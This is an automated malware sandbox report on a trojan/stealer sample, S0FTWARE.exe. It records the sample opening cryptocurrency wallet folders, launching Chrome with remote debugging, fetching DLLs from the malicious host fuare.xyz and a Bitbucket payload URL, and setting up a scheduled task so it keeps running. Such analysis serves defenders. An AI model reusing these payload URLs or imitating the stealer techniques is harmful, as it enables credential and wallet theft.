                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6152, type: MEMORYSTR

                        Remote Access Functionality

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C710C40 sqlite3_bind_zeroblob, 3_2_6C710C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C710D60 sqlite3_bind_parameter_name, 3_2_6C710D60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C638EA0 sqlite3_clear_bindings, 3_2_6C638EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C710B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 3_2_6C710B40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C636410 bind,WSAGetLastError, 3_2_6C636410
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C636070 PR_Listen, 3_2_6C636070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C63C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 3_2_6C63C050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C63C030 sqlite3_bind_parameter_count, 3_2_6C63C030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C6360B0 listen,WSAGetLastError, 3_2_6C6360B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C5C22D0 sqlite3_bind_blob, 3_2_6C5C22D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_6C6363C0 PR_Bind, 3_2_6C6363C0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 File and Directory Permissions Modification | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | 1 Create Account | 1 DLL Side-Loading | 1 Disable or Modify Tools | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Service Execution | 1 Scheduled Task/Job | 1 Windows Service | 1 Abuse Elevation Control Mechanism | NTDS | 166 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 512 Process Injection | 3 Obfuscated Files or Information | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 1 DLL Side-Loading | Cached Domain Credentials | 361 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Masquerading | Proc Filesystem | 13 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 512 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph: Behavior Graph ID: 1555865, Sample: S0FTWARE.exe, Startdate: 14/11/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
S0FTWARE.exe | 29% | ReversingLabs | Win32.Trojan.Generic |

Source | Detection | Scanner | Label | Link
C:\ProgramData\GHDAKKJJJK.exe | 100% | Joe Sandbox ML | |
C:\ProgramData\AAFIJKKEHJ.exe | 4% | ReversingLabs | |
C:\ProgramData\GHDAKKJJJK.exe | 54% | ReversingLabs | Win32.Trojan.BankerX |
C:\ProgramData\GoogleUP\Chrome\Updater.exe | 4% | ReversingLabs | |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\NewApp[1].exe | 4% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exe | 54% | ReversingLabs | Win32.Trojan.BankerX |
C:\Users\user\AppData\Roaming\service.exe | 54% | ReversingLabs | Win32.Trojan.BankerX |
C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy) | 54% | ReversingLabs | Win32.Trojan.BankerX |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        s3-w.us-east-1.amazonaws.com
                        3.5.30.241
                        truefalse
                          high
                          chrome.cloudflare-dns.com
                          172.64.41.3
                          truefalse
                            high
                            bitbucket.org
                            185.166.143.49
                            truefalse
                              high
                              plus.l.google.com
                              216.58.206.78
                              truefalse
                                high
                                t.me
                                149.154.167.99
                                truefalse
                                  high
                                  fuare.xyz
                                  116.203.0.159
                                  truetrue
                                    unknown
                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                    94.245.104.56
                                    truefalse
                                      high
                                      sb.scorecardresearch.com
                                      18.245.60.72
                                      truefalse
                                        high
                                        s-part-0017.t-0009.t-msedge.net
                                        13.107.246.45
                                        truefalse
                                          high
                                          www.google.com
                                          142.250.186.164
                                          truefalse
                                            high
                                            googlehosted.l.googleusercontent.com
                                            142.250.186.97
                                            truefalse
                                              high
                                              sni1gl.wpc.nucdn.net
                                              152.199.21.175
                                              truefalse
                                                high
                                                assets.msn.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  bbuseruploads.s3.amazonaws.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    c.msn.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      ntp.msn.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        clients2.googleusercontent.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          bzib.nelreports.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            apis.google.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              api.msn.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                NameMaliciousAntivirus DetectionReputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                      https://www.youtube.com/chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://drive-daily-5.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://duckduckgo.com/favicon.icochrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://docs.google.com/spreadsheets/chrome.exe, 00000005.00000002.2741278328.000007C00119C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/3078chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/7553chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/5375chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://anglebug.com/5371chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://anglebug.com/4722chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://bbuseruploads.s3.amazonaws.com/11775b90-6f69-4884-847d-757e205605be/downloads/08b6d961-2cc7-BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://m.google.com/devicemanagement/data/apichrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.youtube.com/s/notifications/manifest/cr_install.htmlPchrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://chrome.google.cochrome.exe, 00000005.00000002.2731148106.000007C00012C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://www.innosetup.comDBitLockerToGo.exe, 00000003.00000002.3359198623.0000000003172000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000000.3224811182.00007FF6AEAE2000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://cdn.cookielaw.org/BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLBitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://anglebug.com/7556chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://drive-daily-4.cchrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refBitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://chromewebstore.google.com/chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://www.youtube.com/?feature=ytcaoglchrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://drive-preprod.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://fuare.xyz/sqlo.dllJ&BitLockerToGo.exe, 00000003.00000003.2715960925.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624131446.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2641754783.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2564882804.0000000002EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://html4/loose.dtdS0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://fuare.xyz/vcruntime140.dll6BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://issuetracker.google.com/258207403msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1555865
Start date and time: 2024-11-14 15:24:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 19m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 65
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: S0FTWARE.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@138/236@36/31
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 93
• Number of non-executed functions: 231
Cookbook Comments:
• Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                        • Override analysis time to 240s for powershell
                                                                                                                                                                                                                                                                        • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Execution Graph export aborted for target S0FTWARE.exe, PID 744 because there are no executed functions
• Execution Graph export aborted for target Updater.exe, PID 8020 because there are no executed functions
                                                                                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                        • VT rate limit hit for: S0FTWARE.exe
Time | Type | Description
09:25:49 | API Interceptor | 1x Sleep call for process: BitLockerToGo.exe modified
09:25:59 | API Interceptor | 4x Sleep call for process: svchost.exe modified
09:26:58 | API Interceptor | 1x Sleep call for process: AAFIJKKEHJ.exe modified
09:26:59 | API Interceptor | 18x Sleep call for process: powershell.exe modified
09:27:38 | API Interceptor | 13949440x Sleep call for process: GHDAKKJJJK.exe modified
09:27:40 | API Interceptor | 12478683x Sleep call for process: service.exe modified
15:27:07 | Task Scheduler | Run new task: MyApp path: C:\Users\user\AppData\Roaming\service.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
18.245.60.72 | file.exe | malicious | Stealc, Vidar |
 | https://www.canva.com/design/DAGOCNo1NUI/fm7sxEzJIeZ3v2miLpNZCw/view?utm_content=DAGOCNo1NUI&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | A3W2CpXxiO.exe | malicious | Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | Amadey, Stealc, Vidar |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |
 | https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown |
20.125.209.212 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | Amadey, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | Stealc, Vidar |
 | file.exe | malicious | Amadey, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos |
162.159.61.3 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | Amadey, Stealc, Vidar |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe | malicious | Unknown |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | Launcher 1.0.0.exe | malicious | Unknown |
 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
 | file.exe | malicious | Stealc, Vidar |
 | aba5298f.msi | malicious | Unknown |
 | file.exe | malicious | Amadey, Stealc, Vidar |
